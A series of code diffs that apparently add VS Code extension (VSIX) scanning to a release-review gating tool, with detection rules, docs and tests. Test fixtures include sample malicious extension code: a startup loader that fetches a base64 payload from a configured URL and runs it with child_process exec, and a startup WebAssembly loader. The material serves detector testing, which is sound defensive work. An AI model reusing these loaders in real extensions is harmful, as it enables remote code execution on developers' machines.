+const SAFE_EXTENSION_NAME_RE = /^[a-z0-9][a-z0-9-]{0,127}$/i;
 const SAFE_PUBLISHER_RE = /^[A-Za-z0-9][A-Za-z0-9_-]{0,127}$/;
 const SAFE_VERSION_RE = /^[A-Za-z0-9][A-Za-z0-9._+-]{0,127}$/;
 const SHA256_RE = /^[a-f0-9]{64}$/i;
@@ -52,7 +54,7 @@ export function parseVscodeExtensionManifest(files: FileRecord[]): {
   const publisher = typeof raw.publisher === "string" ? raw.publisher.trim() : "";
   const version = typeof raw.version === "string" ? raw.version.trim() : "";
   if (!SAFE_EXTENSION_NAME_RE.test(name)) {
-    throw new Error("VSIX package.json name must be lowercase alphanumeric/dash");
+    throw new Error("VSIX package.json name must be alphanumeric/dash");
   }
   if (!SAFE_PUBLISHER_RE.test(publisher)) throw new Error("VSIX package.json publisher is invalid");
   if (!SAFE_VERSION_RE.test(version)) throw new Error("VSIX package.json version is invalid");

--- a/server/lib/adapters/vscode/types.ts
+++ b/server/lib/adapters/vscode/types.ts
@@ -1,0 +1,89 @@
+import type { DiffEntry, FileRecord, Finding, RiskLevel } from "../../review";
+
+export const VSCODE_RELEASE_MANIFEST_SCHEMA = "drydock.release-artifacts.v1";
+export const VSCODE_RULES_VERSION = "0.1.0";
+
+export const VSCODE_RULE_IDS = {
+  metadataMismatch: "vscode.metadata-mismatch",
+  broadActivation: "vscode.broad-activation",
+  startupRemoteCommand: "vscode.startup-remote-command",
+  undeclaredConfigurationRead: "vscode.undeclared-configuration-read",
+  extensionDependency: "vscode.extension-dependency",
+} as const;
+
+export type VscodeArtifactKind = "vsix";
+
+export interface VscodeReleaseManifestArtifact {
+  path: string;
+  sha256: string;
+  kind: VscodeArtifactKind;
+}
+
+export interface VscodeReleaseManifest {
+  schema: typeof VSCODE_RELEASE_MANIFEST_SCHEMA;
+  ecosystem: "vscode";
+  package: string;
+  version: string;
+  artifacts: VscodeReleaseManifestArtifact[];
+}
+
+export interface VscodeArtifactInput {
+  path: string;
+  sha256: string;
+  files: FileRecord[];
+}
+
+export interface VscodeAdapterInput {
+  manifest: VscodeReleaseManifest;
+  artifact: VscodeArtifactInput;
+  previousArtifact?: VscodeArtifactInput;
+}
+
+export interface VscodeExtensionManifest {
+  name: string;
+  publisher: string;
+  version: string;
+  displayName: string | null;
+  description: string | null;
+  main: string | null;
+  browser: string | null;
+  activationEvents: string[];
+  extensionDependencies: string[];
+  extensionPack: string[];
+  configurationProperties: string[];
+  enginesVscode: string | null;
+  dependencies: Record<string, string>;
+  devDependencies: Record<string, string>;
+  files: string[] | undefined;
+}
+
+export interface VscodeAdapterDetails {
+  manifest: VscodeReleaseManifest;
+  artifact: {
+    path: string;
+    sha256: string;
+    extensionId: string;
+    packageJsonPath: string;
+    activationEvents: string[];
+    main: string | null;
+    browser: string | null;
+    extensionDependencies: string[];
+    extensionPack: string[];
+    configurationProperties: string[];
+    enginesVscode: string | null;
+  };
+}
+
+export interface VscodeReleaseCandidateReview {
+  ecosystem: "vscode";
+  manifest: VscodeReleaseManifest;
+  package: {
+    name: string | null;
+    version: string | null;
+  };
+  fileCount: number;
+  previousFileCount: number;
+  diff: DiffEntry[];
+  ruleFindings: Finding[];
+  risk: RiskLevel;
+}

--- a/server/lib/adapters/vscode/types.ts
+++ b/server/lib/adapters/vscode/types.ts
@@ -7,6 +7,7 @@ export const VSCODE_RULE_IDS = {
   metadataMismatch: "vscode.metadata-mismatch",
   broadActivation: "vscode.broad-activation",
   startupRemoteCommand: "vscode.startup-remote-command",
+  startupWasmLoader: "vscode.startup-wasm-loader",
   undeclaredConfigurationRead: "vscode.undeclared-configuration-read",
   extensionDependency: "vscode.extension-dependency",
 } as const;

--- a/server/lib/github-app/config.ts
+++ b/server/lib/github-app/config.ts
@@ -9,7 +9,7 @@ export interface GithubAppEnv {
   BETTER_AUTH_SECRET: string;
 }
 
-export const SUPPORTED_ECOSYSTEMS = ["pypi", "npm"] as const;
+export const SUPPORTED_ECOSYSTEMS = ["pypi", "npm", "vscode"] as const;
 export type SupportedEcosystem = (typeof SUPPORTED_ECOSYSTEMS)[number];
 
 export const INSTALLATION_STATUSES = ["active", "suspended", "uninstalled"] as const;

--- a/server/lib/report-export.ts
+++ b/server/lib/report-export.ts
@@ -126,14 +126,19 @@ function extractProvenance(stagedPublish: unknown): ReleaseProvenance | null {
   const provenance = stagedPublish.provenance;
   if (!isRecord(provenance)) return null;
   const { ecosystem, mode, artifacts } = provenance;
-  if ((ecosystem !== "npm" && ecosystem !== "pypi") || mode !== "workflow_gate") return null;
+  if (
+    (ecosystem !== "npm" && ecosystem !== "pypi" && ecosystem !== "vscode") ||
+    mode !== "workflow_gate"
+  ) {
+    return null;
+  }
   if (!Array.isArray(artifacts)) return null;
   const mapped: ReleaseProvenanceArtifact[] = [];
   for (const artifact of artifacts) {
     if (!isRecord(artifact)) return null;
     const { path, kind, sha256 } = artifact;
     if (typeof path !== "string" || typeof sha256 !== "string") return null;
-    if (kind === "tarball" || kind === "wheel" || kind === "sdist") {
+    if (kind === "tarball" || kind === "wheel" || kind === "sdist" || kind === "vsix") {
       mapped.push({ path, kind, sha256 });
       continue;
     }

--- a/server/lib/review-diff-annotation.ts
+++ b/server/lib/review-diff-annotation.ts
@@ -63,6 +63,7 @@ function isReleaseScopedFinding(finding: { ruleId?: string | null }): boolean {
   return Boolean(
     finding.ruleId?.startsWith("stage.") ||
     finding.ruleId?.startsWith("pypi.") ||
+    finding.ruleId?.startsWith("vscode.") ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyUnusualSpec ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyOptionalAdded ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.diffCredentialFileAdded ||

--- a/server/lib/workflow-gates/registry.ts
+++ b/server/lib/workflow-gates/registry.ts
@@ -1,5 +1,6 @@
 import { npmWorkflowGateAdapter } from "./npm";
 import { pypiWorkflowGateAdapter } from "./pypi";
+import { vscodeWorkflowGateAdapter } from "./vscode";
 import type { ArchiveContents, WorkflowGateAdapter } from "./types";
 
 /**
@@ -26,6 +27,7 @@ export class UnsupportedEcosystemError extends Error {
 const WORKFLOW_GATE_ADAPTERS: Record<string, WorkflowGateAdapter> = {
   [pypiWorkflowGateAdapter.ecosystem]: pypiWorkflowGateAdapter,
   [npmWorkflowGateAdapter.ecosystem]: npmWorkflowGateAdapter,
+  [vscodeWorkflowGateAdapter.ecosystem]: vscodeWorkflowGateAdapter,
 };
 
 /** Resolve the workflow-gate adapter for a release target's ecosystem. */

--- a/server/lib/workflow-gates/resolve.ts
+++ b/server/lib/workflow-gates/resolve.ts
@@ -27,7 +27,8 @@ export async function resolveBundleArtifacts(
   bundle: ResolvedReleaseBundle,
 ): Promise<ParsedGateArtifact[]> {
   return mapWithConcurrency(bundle.artifacts, GATE_ARTIFACT_PARSE_CONCURRENCY, async (file) => {
-    const format = file.path.toLowerCase().endsWith(".whl") ? "zip" : "tgz";
+    const lowerPath = file.path.toLowerCase();
+    const format = lowerPath.endsWith(".whl") || lowerPath.endsWith(".vsix") ? "zip" : "tgz";
     const parsed = await downloadInSandboxInline(env, ctx, { bytes: file.bytes, format });
     const contents = { files: parsed.files, packageJson: parsed.packageJson ?? null };
 

--- a/server/lib/workflow-gates/vscode.ts
+++ b/server/lib/workflow-gates/vscode.ts
@@ -49,9 +49,15 @@ function deriveVscodeReleaseCandidates(
     const files = normalizeVsixFiles(artifact.files);
     const { manifest: extensionManifest } = parseExtensionManifest(artifact, files);
     const extensionId = extensionIdFromManifest(extensionManifest);
-    const group = groups.get(extensionId);
+    // The Marketplace resolves publisher/name case-insensitively, and the parser
+    // accepts grandfathered capitalized names, so group by a normalized lowercase
+    // key. This fails closed on case-only duplicates (e.g. golang.Go and
+    // golang.go) instead of splitting them into two review candidates, while the
+    // stored value keeps the original id for display.
+    const identityKey = extensionId.toLowerCase();
+    const group = groups.get(identityKey);
     if (!group) {
-      groups.set(extensionId, { extensionId, version: extensionManifest.version, artifact });
+      groups.set(identityKey, { extensionId, version: extensionManifest.version, artifact });
       continue;
     }
     if (extensionManifest.version !== group.version) {

--- a/server/lib/workflow-gates/vscode.ts
+++ b/server/lib/workflow-gates/vscode.ts
@@ -26,13 +26,11 @@ export const vscodeWorkflowGateAdapter: WorkflowGateAdapter = {
   },
 
   detectArtifact(contents: ArchiveContents): WorkflowArtifactKind | null {
-    const files = normalizeVsixFiles(contents.files);
-    try {
-      parseVscodeExtensionManifest(files);
-      return "vsix";
-    } catch {
-      return null;
-    }
+    void contents;
+    // VSIX has an unambiguous `.vsix` extension. Content detection only runs
+    // for extension-ambiguous tar archives, so claiming here would let npm/PyPI
+    // tarballs that happen to contain `extension/package.json` masquerade as VSIX.
+    return null;
   },
 
   prepareReleaseCandidates(artifacts: ParsedGateArtifact[]): PreparedReleaseCandidate[] {

--- a/server/lib/workflow-gates/vscode.ts
+++ b/server/lib/workflow-gates/vscode.ts
@@ -43,11 +43,34 @@ export const vscodeWorkflowGateAdapter: WorkflowGateAdapter = {
 function deriveVscodeReleaseCandidates(
   artifacts: ParsedGateArtifact[],
 ): PreparedReleaseCandidate[] {
-  return artifacts.map((artifact) => {
+  const groups = new Map<
+    string,
+    { extensionId: string; version: string; artifact: ParsedGateArtifact }
+  >();
+  for (const artifact of artifacts) {
     const files = normalizeVsixFiles(artifact.files);
     const { manifest: extensionManifest } = parseExtensionManifest(artifact, files);
     const extensionId = extensionIdFromManifest(extensionManifest);
-    const manifest = buildManifest(extensionId, extensionManifest.version, artifact);
+    const group = groups.get(extensionId);
+    if (!group) {
+      groups.set(extensionId, { extensionId, version: extensionManifest.version, artifact });
+      continue;
+    }
+    if (extensionManifest.version !== group.version) {
+      throw new WorkflowArtifactError(
+        "artifact_identity_inconsistent",
+        `${artifact.path} version ${extensionManifest.version} disagrees with ${group.version} for ${extensionId}`,
+      );
+    }
+    throw new WorkflowArtifactError(
+      "artifact_identity_inconsistent",
+      `extension ${extensionId} has more than one VSIX artifact in this release`,
+    );
+  }
+
+  return [...groups.values()].map((group) => {
+    const { artifact, extensionId, version } = group;
+    const manifest = buildManifest(extensionId, version, artifact);
     return {
       ecosystem: "vscode",
       pipelineInput: {

--- a/server/lib/workflow-gates/vscode.ts
+++ b/server/lib/workflow-gates/vscode.ts
@@ -45,7 +45,7 @@ function deriveVscodeReleaseCandidates(
 ): PreparedReleaseCandidate[] {
   return artifacts.map((artifact) => {
     const files = normalizeVsixFiles(artifact.files);
-    const { manifest: extensionManifest } = parseVscodeExtensionManifest(files);
+    const { manifest: extensionManifest } = parseExtensionManifest(artifact, files);
     const extensionId = extensionIdFromManifest(extensionManifest);
     const manifest = buildManifest(extensionId, extensionManifest.version, artifact);
     return {
@@ -61,6 +61,19 @@ function deriveVscodeReleaseCandidates(
       package: { name: manifest.package, version: manifest.version },
     };
   });
+}
+
+function parseExtensionManifest(artifact: ParsedGateArtifact, files: ParsedGateArtifact["files"]) {
+  try {
+    return parseVscodeExtensionManifest(files);
+  } catch (err) {
+    throw new WorkflowArtifactError(
+      "artifact_identity_missing",
+      err instanceof Error
+        ? `${artifact.path}: ${err.message}`
+        : `${artifact.path}: VSIX extension identity is not valid`,
+    );
+  }
 }
 
 function buildManifest(extensionId: string, version: string, artifact: ParsedGateArtifact) {

--- a/server/lib/workflow-gates/vscode.ts
+++ b/server/lib/workflow-gates/vscode.ts
@@ -1,0 +1,77 @@
+import {
+  buildVscodeReleaseManifest,
+  extensionIdFromManifest,
+  inferVscodeArtifactKind,
+  normalizeVsixFiles,
+  parseVscodeExtensionManifest,
+  vscodeAdapter,
+} from "../adapters/vscode";
+import type { AdapterBroker, PackageAdapter } from "../adapters/types";
+import { WorkflowArtifactError } from "../github-app/artifacts";
+import type {
+  ArchiveContents,
+  ParsedGateArtifact,
+  PreparedReleaseCandidate,
+  WorkflowArtifactKind,
+  WorkflowGateAdapter,
+} from "./types";
+
+export const vscodeWorkflowGateAdapter: WorkflowGateAdapter = {
+  ecosystem: "vscode",
+  artifactName: "vscode-release-candidate",
+  packageAdapter: vscodeAdapter as PackageAdapter<unknown, AdapterBroker>,
+
+  classifyArtifact(path: string): WorkflowArtifactKind | null {
+    return inferVscodeArtifactKind(path);
+  },
+
+  detectArtifact(contents: ArchiveContents): WorkflowArtifactKind | null {
+    const files = normalizeVsixFiles(contents.files);
+    try {
+      parseVscodeExtensionManifest(files);
+      return "vsix";
+    } catch {
+      return null;
+    }
+  },
+
+  prepareReleaseCandidates(artifacts: ParsedGateArtifact[]): PreparedReleaseCandidate[] {
+    return deriveVscodeReleaseCandidates(artifacts);
+  },
+};
+
+function deriveVscodeReleaseCandidates(
+  artifacts: ParsedGateArtifact[],
+): PreparedReleaseCandidate[] {
+  return artifacts.map((artifact) => {
+    const files = normalizeVsixFiles(artifact.files);
+    const { manifest: extensionManifest } = parseVscodeExtensionManifest(files);
+    const extensionId = extensionIdFromManifest(extensionManifest);
+    const manifest = buildManifest(extensionId, extensionManifest.version, artifact);
+    return {
+      ecosystem: "vscode",
+      pipelineInput: {
+        manifest,
+        artifact: {
+          path: artifact.path,
+          sha256: artifact.sha256,
+          files: artifact.files,
+        },
+      },
+      package: { name: manifest.package, version: manifest.version },
+    };
+  });
+}
+
+function buildManifest(extensionId: string, version: string, artifact: ParsedGateArtifact) {
+  try {
+    return buildVscodeReleaseManifest(extensionId, version, [
+      { path: artifact.path, sha256: artifact.sha256 },
+    ]);
+  } catch (err) {
+    throw new WorkflowArtifactError(
+      "artifact_identity_missing",
+      err instanceof Error ? err.message : "derived VSIX release identity is not valid",
+    );
+  }
+}

--- a/src/models/github-app.ts
+++ b/src/models/github-app.ts
@@ -16,7 +16,7 @@ export interface PublicGithubAppInstallation {
   updatedAt: string;
 }
 
-export type SupportedEcosystem = "pypi" | "npm";
+export type SupportedEcosystem = "pypi" | "npm" | "vscode";
 
 export interface PublicReleaseTarget {
   id: string;

--- a/src/pages/Dashboard/ScanDetail/ReportSections.tsx
+++ b/src/pages/Dashboard/ScanDetail/ReportSections.tsx
@@ -102,7 +102,12 @@ function AiFindingList({ findings }: { findings: AiFinding[] }) {
 }
 
 function ProvenanceView({ provenance }: { provenance: ReleaseProvenance }) {
-  const ecosystem = provenance.ecosystem === "pypi" ? "PyPI" : "npm";
+  const ecosystem =
+    provenance.ecosystem === "pypi"
+      ? "PyPI"
+      : provenance.ecosystem === "vscode"
+        ? "VS Code"
+        : "npm";
   return (
     <div class="flex flex-col gap-3">
       <p class="m-0 text-[13px] leading-[1.6] text-ink-muted">

--- a/src/pages/Docs/index.tsx
+++ b/src/pages/Docs/index.tsx
@@ -203,6 +203,10 @@ export default function DocsPage() {
               tarballs, PyPI sdists/wheels, and VSIX files apart by their names and parsed metadata,
               so the same gate can review one ecosystem or a mixed monorepo at once.
             </Prose>
+            <Prose>
+              VSIX reviews also flag broad startup activation, transitive extension installs, and
+              startup loaders that execute remote commands or bundled WebAssembly payloads.
+            </Prose>
           </Subsection>
 
           <Subsection title="Monorepo releases">

--- a/src/pages/Docs/index.tsx
+++ b/src/pages/Docs/index.tsx
@@ -122,23 +122,26 @@ export default function DocsPage() {
         <section id="workflow-gating" class="flex flex-col gap-8 scroll-mt-6">
           <div class="flex flex-col gap-3">
             <SectionLabel>
-              Workflow gating: PyPI &amp; npm on GitHub Actions <Badge tone="info">Preview</Badge>
+              Workflow gating — PyPI, npm &amp; VS Code on GitHub Actions{" "}
+              <Badge tone="info">Preview</Badge>
             </SectionLabel>
             <h2 class="text-2xl font-semibold tracking-[-0.015em] m-0 max-w-[680px]">
               When the registry can't pause, the workflow can.
             </h2>
             <Prose>
-              PyPI has no staging step, and some npm workflows publish directly from CI. For those
-              releases, the publish job becomes the checkpoint: CI builds wheels, sdists, or
-              tarballs, uploads them as a workflow artifact, and enters a GitHub Environment
-              protected by Drydock. Drydock reviews the upload and records a recommendation; a
-              maintainer approves or rejects in the workbench; if approved, the job continues using
-              its own credential.
+              PyPI has no staging step, not every npm publish uses one, and VS Code extensions ship
+              as Marketplace VSIX files. For those releases the publish job itself becomes the
+              checkpoint. CI builds the release files (wheels and sdists for PyPI, packed tarballs
+              for npm, or VSIX files for VS Code) and uploads them, and a GitHub Environment with
+              Drydock's protection rule holds the publish job. Drydock reviews the upload and
+              records a recommendation, but a maintainer makes the decision from the review
+              workbench, and only then is the held job released or blocked. The publish runs on the
+              workflow's own credential, so Drydock never holds it.
             </Prose>
             <Prose>
-              PyPI and npm use the same gate. Drydock detects each package's ecosystem from the
-              uploaded files, so this walkthrough uses PyPI as the example. For npm, a workflow gate
-              is the alternative to{" "}
+              PyPI, npm, and VS Code extensions sit behind the same gate, and Drydock works out each
+              package's ecosystem from the uploaded files on its own. This walkthrough uses PyPI as
+              the example. For npm, a workflow gate is the alternative to{" "}
               <a class="underline" href="#staged-publishing">
                 staged-publish review
               </a>{" "}
@@ -182,11 +185,11 @@ export default function DocsPage() {
 
           <Subsection title="Release-candidate bundle">
             <Prose>
-              You do not write a manifest. CI builds and uploads <Code>dist/*</Code>, and Drydock
-              treats every <Code>.whl</Code>, <Code>.tar.gz</Code>, and <Code>.tgz</Code> it finds
-              in the upload as part of the release. The settings form can narrow this down to one
-              artifact name; when left blank, Drydock inspects every non-expired artifact from the
-              held run and fails closed if an archive is ambiguous.
+              There is no manifest to write. CI builds and uploads <Code>dist/*</Code>, and Drydock
+              treats every <Code>.whl</Code>, <Code>.tar.gz</Code>, <Code>.tgz</Code>, and{" "}
+              <Code>.vsix</Code> it finds in the upload as part of the release. The settings form
+              can narrow this down to one artifact name; when left blank, Drydock inspects every
+              non-expired artifact from the held run and fails closed if an archive is ambiguous.
             </Prose>
             <Prose>
               Drydock reads each package's name and version out of the files themselves and
@@ -196,9 +199,9 @@ export default function DocsPage() {
               provably the bytes that get published, with no rebuild in between.
             </Prose>
             <Prose>
-              You usually do not declare which ecosystem you're publishing. Drydock tells an npm
-              tarball from a PyPI sdist by looking inside it, so the same gate can review either one
-              or both at once in a mixed monorepo.
+              You usually do not declare which ecosystem you're publishing. Drydock tells npm
+              tarballs, PyPI sdists/wheels, and VSIX files apart by their names and parsed metadata,
+              so the same gate can review one ecosystem or a mixed monorepo at once.
             </Prose>
           </Subsection>
 

--- a/test/fixtures/security-corpus/cases-vscode/benign-command-activation.json
+++ b/test/fixtures/security-corpus/cases-vscode/benign-command-activation.json
@@ -1,0 +1,27 @@
+{
+  "id": "vscode-benign-command-activation",
+  "title": "VSIX with narrow command activation and declared settings",
+  "category": "benign",
+  "intent": "A minimal VS Code command extension with declared configuration should not trigger VS Code-specific malware rules.",
+  "extensionId": "example.remote-text-fetcher",
+  "version": "1.0.0",
+  "sha256": "abababababababababababababababababababababababababababababababab",
+  "stagedFiles": [
+    {
+      "path": "extension/package.json",
+      "size": 383,
+      "sha256": "00",
+      "flags": [],
+      "textSample": "{\n  \"name\": \"remote-text-fetcher\",\n  \"publisher\": \"example\",\n  \"version\": \"1.0.0\",\n  \"engines\": { \"vscode\": \"^1.80.0\" },\n  \"main\": \"./out/extension\",\n  \"activationEvents\": [\"onCommand:remoteTextFetcher.run\"],\n  \"contributes\": {\n    \"configuration\": {\n      \"properties\": {\n        \"remoteTextFetcher.url\": { \"type\": \"string\" }\n      }\n    }\n  }\n}\n"
+    },
+    {
+      "path": "extension/out/extension.js",
+      "size": 126,
+      "sha256": "00",
+      "flags": [],
+      "textSample": "const vscode = require('vscode');\nfunction activate() {\n  return vscode.workspace.getConfiguration('remoteTextFetcher').get('url');\n}\n"
+    }
+  ],
+  "expectedRisk": "low",
+  "expectedFindings": []
+}

--- a/test/fixtures/security-corpus/cases-vscode/startup-remote-command-loader.json
+++ b/test/fixtures/security-corpus/cases-vscode/startup-remote-command-loader.json
@@ -1,0 +1,42 @@
+{
+  "id": "vscode-startup-remote-command-loader",
+  "title": "VSIX startup activation fetches and executes a remote command",
+  "category": "vscode-extension",
+  "intent": "Models malicious VS Code extensions that activate on startup, read an undeclared operator-controlled configuration key, fetch an encoded payload, and execute it with child_process.",
+  "extensionId": "example.remote-text-fetcher",
+  "version": "1.0.0",
+  "sha256": "abababababababababababababababababababababababababababababababab",
+  "stagedFiles": [
+    {
+      "path": "extension/package.json",
+      "size": 383,
+      "sha256": "00",
+      "flags": [],
+      "textSample": "{\n  \"name\": \"remote-text-fetcher\",\n  \"publisher\": \"example\",\n  \"version\": \"1.0.0\",\n  \"engines\": { \"vscode\": \"^1.80.0\" },\n  \"main\": \"./out/extension\",\n  \"activationEvents\": [\"onStartupFinished\"],\n  \"contributes\": {\n    \"configuration\": {\n      \"properties\": {\n        \"remoteTextFetcher.url\": { \"type\": \"string\" }\n      }\n    }\n  }\n}\n"
+    },
+    {
+      "path": "extension/out/extension.js",
+      "size": 349,
+      "sha256": "00",
+      "flags": [],
+      "textSample": "const vscode = require('vscode');\nconst https = require('https');\nconst { exec } = require('child_process');\nfunction activate() {\n  const url = vscode.workspace.getConfiguration('agentService').get('url');\n  https.get(url, res => res.on('data', chunk => {\n    const cmd = Buffer.from(String(chunk), 'base64').toString('utf8');\n    exec(cmd);\n  }));\n}\n"
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    { "ruleId": "code.process-execution", "severity": "high", "file": "out/extension.js" },
+    { "ruleId": "code.network-access", "severity": "high", "file": "out/extension.js" },
+    { "ruleId": "code.dynamic-evaluation", "severity": "high", "file": "out/extension.js" },
+    { "ruleId": "vscode.broad-activation", "severity": "high", "file": "package.json" },
+    {
+      "ruleId": "vscode.startup-remote-command",
+      "severity": "critical",
+      "file": "out/extension.js"
+    },
+    {
+      "ruleId": "vscode.undeclared-configuration-read",
+      "severity": "high",
+      "file": "out/extension.js"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-vscode/startup-wasm-loader.json
+++ b/test/fixtures/security-corpus/cases-vscode/startup-wasm-loader.json
@@ -1,0 +1,43 @@
+{
+  "id": "vscode-startup-wasm-loader",
+  "title": "VSIX startup activation runs a bundled WebAssembly loader",
+  "category": "vscode-extension",
+  "intent": "Models VS Code malware that auto-activates at startup, instantiates a bundled WebAssembly module through the TinyGo loader shape, and hides behavior inside the binary payload.",
+  "extensionId": "example.remote-text-fetcher",
+  "version": "1.0.0",
+  "sha256": "abababababababababababababababababababababababababababababababab",
+  "stagedFiles": [
+    {
+      "path": "extension/package.json",
+      "size": 241,
+      "sha256": "00",
+      "flags": [],
+      "textSample": "{\n  \"name\": \"remote-text-fetcher\",\n  \"publisher\": \"example\",\n  \"version\": \"1.0.0\",\n  \"engines\": { \"vscode\": \"^1.80.0\" },\n  \"main\": \"./out/extension\",\n  \"activationEvents\": [\"onStartupFinished\"]\n}\n"
+    },
+    {
+      "path": "extension/out/extension.js",
+      "size": 195,
+      "sha256": "00",
+      "flags": [],
+      "textSample": "const go = new Go();\nasync function activate() {\n  const source = await WebAssembly.instantiateStreaming(fetch('./payload.wasm'), go.importObject);\n  go.run(source.instance);\n}\nexports.activate = activate;\n"
+    },
+    {
+      "path": "extension/out/payload.wasm",
+      "size": 824552,
+      "sha256": "00",
+      "flags": ["binary"]
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    { "ruleId": "code.network-access", "severity": "high", "file": "out/extension.js" },
+    { "ruleId": "code.dynamic-evaluation", "severity": "high", "file": "out/extension.js" },
+    { "ruleId": "file.native-artifact", "severity": "high", "file": "out/payload.wasm" },
+    { "ruleId": "vscode.broad-activation", "severity": "high", "file": "package.json" },
+    {
+      "ruleId": "vscode.startup-wasm-loader",
+      "severity": "critical",
+      "file": "out/extension.js"
+    }
+  ]
+}

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -713,6 +713,44 @@ describe("review", () => {
     });
   });
 
+  test("keeps VS Code adapter findings release scoped on an unchanged file with a baseline", () => {
+    const unchangedFile = {
+      path: "out/extension.js",
+      size: 40,
+      sha256: "same",
+      textSample: "exports.activate = () => require('vm').runInThisContext(x);",
+      flags: [],
+    };
+    const diff = [{ path: "out/extension.js", status: "unchanged" }];
+    // A VSIX with a marketplace baseline whose flagged file did not change since
+    // the last release. The finding is a property of the release, not a line
+    // diff, so it must stay release-scoped instead of falling through to a
+    // releaseDelta: false diff annotation that understates releaseRisk.
+    const annotated = annotateFindingsWithDiffStatus(
+      [
+        {
+          severity: "high",
+          file: "out/extension.js",
+          line: 1,
+          evidence: "activation loads a WebAssembly module on startup",
+          reason: "startup wasm loader",
+          ruleId: "vscode.startup-wasm-loader",
+        },
+      ],
+      diff,
+      {
+        codePatternSet: "javascript",
+        previousFiles: [unchangedFile],
+        stagedFiles: [unchangedFile],
+      },
+    );
+
+    expect(annotated[0]).toMatchObject({
+      diffStatus: "unchanged",
+      releaseDelta: true,
+    });
+  });
+
   test("package json diff summarizes release-review sensitive fields", () => {
     const summary = summarizePackageJsonDiff(
       {

--- a/test/security-corpus-vscode.test.mjs
+++ b/test/security-corpus-vscode.test.mjs
@@ -1,0 +1,70 @@
+import { readdirSync, readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+import { describe, expect, test } from "vitest";
+import {
+  buildVscodeReleaseManifest,
+  createVscodeExtensionReview,
+  VSCODE_RULE_IDS,
+  VSCODE_RULES_VERSION,
+} from "../server/lib/adapters/vscode/index";
+import { DETERMINISTIC_RULES_VERSION } from "../server/lib/review.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const casesDir = join(__dirname, "fixtures/security-corpus/cases-vscode");
+const cases = readdirSync(casesDir)
+  .filter((file) => file.endsWith(".json"))
+  .sort()
+  .map((file) => JSON.parse(readFileSync(join(casesDir, file), "utf8")));
+
+function comparableFindings(findings) {
+  return findings
+    .map((finding) => ({
+      ruleId: finding.ruleId,
+      severity: finding.severity,
+      file: finding.file,
+    }))
+    .sort((a, b) =>
+      `${a.ruleId}:${a.severity}:${a.file}`.localeCompare(`${b.ruleId}:${b.severity}:${b.file}`),
+    );
+}
+
+describe("VS Code security detection golden corpus", () => {
+  test("corpus contains unique fixture IDs", () => {
+    expect(cases.length).toBeGreaterThan(0);
+    expect(new Set(cases.map((fixture) => fixture.id)).size).toBe(cases.length);
+  });
+
+  for (const fixture of cases) {
+    test(`${fixture.id}: ${fixture.title}`, () => {
+      const path = fixture.artifactPath ?? `dist/${fixture.extensionId}-${fixture.version}.vsix`;
+      const manifest = buildVscodeReleaseManifest(fixture.extensionId, fixture.version, [
+        { path, sha256: fixture.sha256 },
+      ]);
+      const review = createVscodeExtensionReview({
+        manifest,
+        artifact: { path, sha256: fixture.sha256, files: fixture.stagedFiles },
+        ...(fixture.previousFiles
+          ? {
+              previousArtifact: {
+                path,
+                sha256: fixture.previousSha256,
+                files: fixture.previousFiles,
+              },
+            }
+          : {}),
+      });
+
+      expect(review.risk).toBe(fixture.expectedRisk);
+      expect(comparableFindings(review.ruleFindings)).toEqual(
+        comparableFindings(fixture.expectedFindings ?? []),
+      );
+      for (const finding of review.ruleFindings) {
+        const expectedVersion = Object.values(VSCODE_RULE_IDS).includes(finding.ruleId)
+          ? VSCODE_RULES_VERSION
+          : DETERMINISTIC_RULES_VERSION;
+        expect(finding.ruleVersion).toBe(expectedVersion);
+      }
+    });
+  }
+});

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -60,6 +60,34 @@ function extensionPackageJson(overrides = {}) {
 }
 
 describe("VS Code extension review adapter", () => {
+  test("uses extension/package.json instead of a top-level decoy manifest", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file(
+          "package.json",
+          JSON.stringify({
+            name: "benign-decoy",
+            publisher: "example",
+            version: "1.0.0",
+            engines: { vscode: "^1.80.0" },
+            activationEvents: ["onCommand:benign.run"],
+          }),
+        ),
+        file("extension/package.json", extensionPackageJson()),
+        file("extension/out/extension.js", "exports.activate = () => {};"),
+      ]),
+    });
+
+    expect(review.package).toEqual({ name: "example.remote-text-fetcher", version: "1.0.0" });
+    expect(review.ruleFindings.map((finding) => finding.ruleId)).toEqual(
+      expect.arrayContaining([VSCODE_RULE_IDS.broadActivation]),
+    );
+  });
+
   test("detects startup remote command loader behavior in a VSIX", () => {
     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -134,6 +134,34 @@ describe("VS Code extension review adapter", () => {
     expect(review.risk).toBe("critical");
   });
 
+  test("does not treat unreachable WebAssembly loaders as startup-loaded", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file("extension/package.json", extensionPackageJson()),
+        file("extension/out/extension.js", "exports.activate = () => {};"),
+        file(
+          "extension/test/wasm.test.js",
+          [
+            "const go = new Go();",
+            "async function loadFixture() {",
+            "  const source = await WebAssembly.instantiateStreaming(fetch('./payload.wasm'), go.importObject);",
+            "  go.run(source.instance);",
+            "}",
+          ].join("\n"),
+        ),
+        binary("extension/test/payload.wasm", 824552),
+      ]),
+    });
+
+    expect(review.ruleFindings.map((finding) => finding.ruleId)).not.toEqual(
+      expect.arrayContaining([VSCODE_RULE_IDS.startupWasmLoader]),
+    );
+  });
+
   test("allows declared configuration reads and narrow activation", () => {
